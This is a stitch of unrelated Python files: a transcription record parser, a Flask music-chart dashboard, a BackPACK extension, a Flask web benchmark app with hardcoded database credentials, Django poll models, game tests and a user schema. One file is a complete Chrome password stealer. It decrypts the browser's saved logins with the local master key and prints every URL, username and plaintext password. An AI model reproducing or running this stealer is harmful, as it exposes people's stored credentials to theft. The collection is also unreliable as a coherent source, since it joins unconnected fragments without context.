if R is not None:
self.add(R) # Add current record to the recordset
#print("Record is:", R.get_field_tasks())
prev_record = self.get_last_added()
if 'create' in actions:
R = classificationRecord(self, prev_record) # Create a new record
if 'add' in actions:
if R is None:
R = classificationRecord(self, prev_record)
# There is a data error in the current version of the export which means that
# the first task of a group is not always coming through.
# Ideally this would be the 'create' task and would also provide a label
# for the type of record.
print("********** Warning: expected create action missing:",this_ann['task'])
#Hacky: treat dropdowns as strings, instead of reconciling on their own terms.
#TODO: Consider writing custom comparison code for dropdowns. If not, consider
# converting them into strings where we manipulate the task queue (higher
# in this same function), just to keep all of our manipulations together.
if 'task_type' in this_ann:
if this_ann['task_type'] == 'dropdown-simple':
if 'label' in this_ann['value']:
R.add(this_ann['value']['label'], this_ann['task'])
else:
R.add('', this_ann['task'])
else:
assert False, 'Surprising task type'
else:
R.add(this_ann['value'], this_ann['task']) # Add field value to the current record
if R.has_dittos:
self.has_dittos = True
# A classificationRecord object represents a single entry in a RecordSet (e.g. a row in a list of people)
# Each item added will represent a field in the Record
class classificationRecord(classificationObject):
delimiter = chr(31) #^_ in less
#def __init__(self, parent=None, predecessor=None):
# super().__init__(parent, predecessor)
# self.delimiter = chr(31)
def add(self, value, key=None):
predecessor = self.get_last_added()
field = classificationField(self, predecessor)
field.add(value)
if field.has_dittos:
self.has_dittos = True
super().add(field, key)
def get_field_tasks(self):
return [k for k in self.items.keys()]
class classificationField(classificationObject):
def add(self, value, key=None):
tokens = value.split(self.delimiter)
prev_token = None
for tk in tokens:
CW = classificationWord(tk, self, prev_token)
if CW.has_dittos:
self.has_dittos = True
super().add(CW)
if CW.has_dittos:
if self.parent is not None:
if self.parent.predecessor is not None:
parent_index = len(self.parent.items)
this_index = len(self.items)-1
#print("idx",parent_index,this_index,"parent",self.parent.get_delimited(),"pred",self.parent.predecessor.get_delimited())
predecessor_field = self.parent.predecessor.get_by_index(parent_index)
key = CW.key_index[0]
if isinstance(predecessor_field,classificationObject):
self.items = predecessor_field.items
self.key_index = predecessor_field.key_index
#print(self.get_delimited(),"updated", self.parent.get_delimited())
prev_token = CW
class classificationWord(classificationObject):
delimiter = chr(0) #^@ in less
ditto_test = Ditto()
def __init__(self, token=None, parent=None, predecessor=None):
super().__init__(parent, predecessor)
#self.delimiter = chr(0)
if token is not None:
self.add(token)
def add(self, value, key=None):
if self.ditto_test.is_ditto(value):
super().add(Ditto())
self.has_dittos = True
return
for c in value.split(self.delimiter):
super().add(c)
# If you were to implement objects down to Token level this is how it would work
# There are advantages to this for individual character comparisons
        # However, before doing that the alignment code would need to change as it has
# character positions at the field level rather than word
#tokens = list(c)
#for t in tokens:
# CT = classificationToken()
# CT.add(t)
# super().add(CT)
class classificationToken(classificationObject):
delimiter = chr(0) #^@ in less
# taskActions are used to identify recordssets, records and fields through the tasks in a workflow
# Example code for loading is in the align_workflows.py file
# Usage to filter workflow is in the classificationRecordSet class above
class taskActions:
def __init__(self):
self.actions = {}
def add(self, action_name, workflows):
if isinstance(workflows, str): # Allows single item workflow to be passed as a string
workflows = [workflows]
for w in workflows:
if w not in self.actions:
self.actions[w] = []
self.actions[w].append(action_name)
if __name__ == "__main__":
D = Ditto()
print(D.is_ditto("vair"),"vair")
print(D.is_ditto('"'),'"')
print(D.is_ditto("~do~"),"~do~")
print(D.is_ditto("-ddd-"), "-ddd-")
print(D.is_ditto("-DDD-"), "-DDD-")
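    # Hedged sketch of how taskActions is assembled; the task ids below are
    # illustrative placeholders (the real mapping lives in align_workflows.py).
    TA = taskActions()
    TA.add('create', 'T0')
    TA.add('add', ['T1', 'T2'])
    TA.add('close', 'T3')
    print(TA.actions)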
|
import base64
import win32crypt
from os import getenv
import sqlite3
import json
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from shutil import copyfile
def decryptPass():
Localstate = getenv("LocalAppData")+"\\Google\\Chrome\\User Data\\Local State"
with open(Localstate,"r") as f:
content = f.read()
key = json.loads(content)['os_crypt']['encrypted_key']
a = base64.b64decode(key)
originkey = win32crypt.CryptUnprotectData(a[5::], None, None, None, 0)[1]
copyfile(getenv("LocalAppData") + "\\Google\\Chrome\\User Data\\Default\\Login Data","tmp_Login_Data")
conn = sqlite3.connect("tmp_Login_Data")
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
iv = result[2][3:15]
enctext = result[2][15:]
aesgcm=AESGCM(originkey)
plaintext = aesgcm.decrypt(iv,enctext,None).decode('utf-8')
url = result[0]
username = result[1]
if not url and not username:
pass
else:
print(url+","+username+","+plaintext)
if __name__ == '__main__':
    decryptPass()
|
import pandas as pd
import numpy as np
import plotly.express as px
import plotly
import json
import plotly.io as pio
from flask import Flask, render_template
pio.renderers.default = "browser"
app = Flask(__name__,template_folder='templates')
##### Data import #######
#use encoder to avoid utf-8 error
df = pd.read_csv('top10s.csv',encoding = "ISO-8859-1")
# drop the id column
df = df.iloc[:,1:15]
df = df.loc[df['year']>=2015]
# keep only the last 5 years of data (2015 onwards)
print(df.head())
print('Data frame shape: {}'.format(df.shape))
##### Data preprocessing ########
famous_genres = df['top genre'].value_counts().head(5).to_frame().reset_index()
famous_genres.columns = ['genre','Count']
famous_genres_list = list(famous_genres['genre'])
top_5_genre = famous_genres_list
df_top = df.loc[df['top genre'].isin(top_5_genre)]
group_by_genre = df_top.groupby(["year","top genre"]).mean().sort_values('year').reset_index()
famous_artist = df['artist'].value_counts().head(5).to_frame().reset_index()
famous_artist.columns = ['artist','Count']
famous_artist_list = list(famous_artist['artist'])
top_5_artist = famous_artist_list
df_top_artist = df.loc[df['artist'].isin(top_5_artist)]
##### Visualisations ######
def create_fig1():
fig1= px.scatter(df, x='dnce', y='nrgy', color='nrgy', hover_name='title', hover_data=['artist', 'year'],title ='Distribution of energy and danceability')
return fig1
fig1=create_fig1()
def create_fig2():
fig2 = px.line(group_by_genre,
x='year',
y='pop',
line_group='top genre',
title='Top Genres Average Popularity',
template='plotly_white',
color='top genre')
return fig2
fig2=create_fig2()
def create_fig3():
# Visualize
fig3 = px.bar(famous_artist.sort_values('Count'),
x='Count',
y='artist',
title='Top 5 Artist',
template='plotly_white',
orientation='h')
return fig3
fig3=create_fig3()
def create_fig4():
fig4 = px.violin(df, y='dnce', color='year', points='all', hover_name='title', hover_data=['artist'] , title='Danceability of songs')
return fig4
fig4=create_fig4()
def create_fig5():
# Average Popularity of a particular genre over the years
fig5 = px.box(df_top_artist,
x='artist',
y='pop',
hover_name='title',
title='Artist Songs Popularity Distribution',
template='plotly_white',
points='all')
return fig5
fig5=create_fig5()
def create_fig6():
fig6= px.scatter(df_top,
x='pop',
y='bpm',
color='top genre',title='Distribution of popularity and BPM')
return fig6
fig6=create_fig6()
@app.route("/")
def index():
figures = []
figures.append(fig1)
figures.append(fig2)
figures.append(fig3)
figures.append(fig4)
figures.append(fig5)
figures.append(fig6)
ids = ['figure-{}'.format(i) for i, _ in enumerate(figures)]
figuresJSON = json.dumps(figures, cls=plotly.utils.PlotlyJSONEncoder)
return render_template('index.html',ids=ids,figuresJSON=figuresJSON)
if __name__ == "__main__":
print(df)
result = app.run(debug=True, port=5000)
print(result)
|
"""Holds ``DiagGGN{Exact, MC}`` extension for BackPACK's custom ``Slicing`` module."""
from backpack.core.derivatives.slicing import SlicingDerivatives
from backpack.extensions.secondorder.diag_ggn.diag_ggn_base import DiagGGNBaseModule
class DiagGGNSlicing(DiagGGNBaseModule):
"""``DiagGGN{Exact, MC}`` for ``backpack.custom_modules.slicing.Slicing``."""
def __init__(self):
"""Pass derivatives for ``backpack.custom_modules.pad.Pad`` module."""
super().__init__(SlicingDerivatives())
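def _diag_ggn_usage_sketch():
    """Hedged usage sketch, not part of the extension itself.

    Shows how ``DiagGGNExact`` is typically applied through BackPACK's public
    API; the toy model, loss, and data below are illustrative assumptions.
    """
    import torch
    from backpack import backpack, extend
    from backpack.extensions import DiagGGNExact

    model = extend(torch.nn.Linear(4, 2))
    lossfunc = extend(torch.nn.CrossEntropyLoss())
    X, y = torch.randn(8, 4), torch.randint(0, 2, (8,))
    loss = lossfunc(model(X), y)
    with backpack(DiagGGNExact()):
        loss.backward()
    for param in model.parameters():
        print(param.diag_ggn_exact.shape)  # GGN diagonal, same shape as param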
|
#!/usr/bin/env python
from collections import namedtuple
from operator import attrgetter
from random import randint
import sys
from flask import Flask, request, render_template, make_response, jsonify
from pony import orm
if sys.version_info[0] == 3:
xrange = range
_is_pypy = hasattr(sys, "pypy_version_info")
if _is_pypy:
from psycopg2cffi import compat
compat.register()
DBDRIVER = "postgres"
DBHOST = "tfb-database"
# setup
app = Flask(__name__)
# Start Contrast Specific Changes
from contrast.agent.middlewares.flask_middleware import FlaskMiddleware as ContrastMiddleware
app.wsgi_app = ContrastMiddleware(app)
# End Contrast Specific Changes
app.config[
"STORM_DATABASE_URI"
] = "{DBDRIVER}://benchmarkdbuser:benchmarkdbpass@{DBHOST}:5432/hello_world".format(
DBDRIVER=DBDRIVER, DBHOST=DBHOST
)
app.config["JSONIFY_PRETTYPRINT_REGULAR"] = False
db = orm.Database()
db.bind(
DBDRIVER,
host=DBHOST,
port=5432,
user="benchmarkdbuser",
password="benchmarkdbpass",
database="hello_world",
)
class World(db.Entity):
_table_ = "world"
id = orm.PrimaryKey(int)
randomNumber = orm.Required(int, column="randomnumber")
def to_dict(self):
"""Return object data in easily serializeable format"""
return {"id": self.id, "randomNumber": self.randomNumber}
class Fortune(db.Entity):
_table_ = "fortune"
id = orm.PrimaryKey(int, auto=True)
message = orm.Required(str)
db.generate_mapping(create_tables=False)
def get_num_queries():
try:
num_queries = request.args.get("queries", 1, type=int)
except ValueError:
num_queries = 1
if num_queries < 1:
return 1
if num_queries > 500:
return 500
return num_queries
def generate_ids(num_queries):
ids = {randint(1, 10000) for _ in xrange(num_queries)}
while len(ids) < num_queries:
ids.add(randint(1, 10000))
return list(sorted(ids))
@app.route("/json")
def hello():
return jsonify(message="Hello, World!")
@app.route("/query")
def get_random_world():
with orm.db_session(serializable=False):
worlds = [World[ident].to_dict() for ident in generate_ids(get_num_queries())]
return jsonify(worlds)
@app.route("/db")
def get_random_world_single():
wid = randint(1, 10000)
with orm.db_session(serializable=False):
world = World[wid]
return jsonify(world.to_dict())
@app.route("/fortunes")
def get_fortunes():
with orm.db_session(serializable=False):
fortunes = list(orm.select(fortune for fortune in Fortune))
tmp_fortune = namedtuple("Fortune", ["id", "message"])
fortunes.append(
tmp_fortune(id=0, message="Additional fortune added at request time.")
)
fortunes.sort(key=attrgetter("message"))
return render_template("fortunes.html", fortunes=fortunes)
@app.route("/updates")
def updates():
"""Test 5: Database Updates"""
num_queries = get_num_queries()
ids = generate_ids(num_queries)
ids.sort()
worlds = []
with orm.db_session(serializable=False):
for ident in ids:
world = World[ident]
world.randomNumber = randint(1, 10000)
worlds.append({"id": world.id, "randomNumber": world.randomNumber})
return jsonify(worlds)
@app.route("/plaintext")
def plaintext():
"""Test 6: Plaintext"""
response = make_response(b"Hello, World!")
response.content_type = "text/plain"
return response
try:
import meinheld
meinheld.server.set_access_logger(None)
meinheld.set_keepalive(120)
except ImportError:
pass
# entry point for debugging
if __name__ == "__main__":
app.run(debug=True)
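def _num_queries_clamp_demo():
    # Hedged sketch, not part of the benchmark app: exercising get_num_queries()
    # outside a live request via Flask's test_request_context. The query strings
    # below are illustrative.
    with app.test_request_context("/query?queries=999"):
        assert get_num_queries() == 500  # clamped to the upper bound
    with app.test_request_context("/query?queries=0"):
        assert get_num_queries() == 1  # clamped to the lower bound
    with app.test_request_context("/query?queries=foo"):
        assert get_num_queries() == 1  # non-integers fall back to the default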
|
from django.db import models
from .validators import validate_length
class Poll(models.Model):
state = models.CharField(max_length=256)
begin_time = models.DateTimeField()
end_time = models.DateTimeField()
name = models.CharField(max_length=512)
class Vote(models.Model):
option = models.CharField(max_length=512)
sign = models.CharField(max_length=64, validators=[validate_length])
poll = models.ForeignKey(Poll, on_delete=models.RESTRICT)
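def _example_poll_and_vote():
    # Hedged sketch, not part of the original models module: creating a poll
    # and a vote through the ORM (run inside a configured Django environment,
    # e.g. ``manage.py shell``). Field values are illustrative assumptions.
    from datetime import timedelta
    from django.utils import timezone

    poll = Poll.objects.create(
        state="open",
        begin_time=timezone.now(),
        end_time=timezone.now() + timedelta(days=7),
        name="Favourite language",
    )
    return Vote.objects.create(option="Python", sign="x" * 64, poll=poll)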
|
"""
unit testing of bounce.py
"""
import os
import sys
import unittest
from turtle import *
from freegames.utils import vector
class memoryTestCase(unittest.TestCase):
def test_memory_index(self):
from freegames.memory import index
testx = 100
testy = 200
output = index(testx, testy)
        self.assertEqual(output, 70)
def test_memory_xy(self):
from freegames.memory import xy
num = 50
compare = xy(num)
        self.assertEqual((-100, 100), compare)
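# Hedged addition, not in the original file: allow running the tests by
# executing this file directly as well as via ``python -m unittest``.
if __name__ == "__main__":
    unittest.main()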
|
"""Command-line scripts provided by the desisurvey package.
"""
|
from app.helpers.regex_helper import RegexHelper
users = {
'item_title': 'User',
'schema': {
'name': {
'type': 'string',
'required': True,
'regex': RegexHelper.USERNAME
},
'email': {
'type': 'string',
'unique': True,
'regex': RegexHelper.EMAIL_ADDRESS
},
'password': {
'type': 'string',
},
'role': {
'type': 'string',
'allowed': ['admin', 'player']
},
'access_right': {
'type': 'objectid',
'data_relation': {
'resource': 'access--rights',
'embeddable': True
}
}
}
}
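def _build_example_app():
    # Hedged sketch, not part of the original resource definition: wiring the
    # ``users`` resource into an Eve application through the DOMAIN setting.
    # Passing the settings as a dict here is for illustration; a real project
    # usually keeps them in a settings.py alongside this definition.
    from eve import Eve
    return Eve(settings={"DOMAIN": {"users": users}})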
|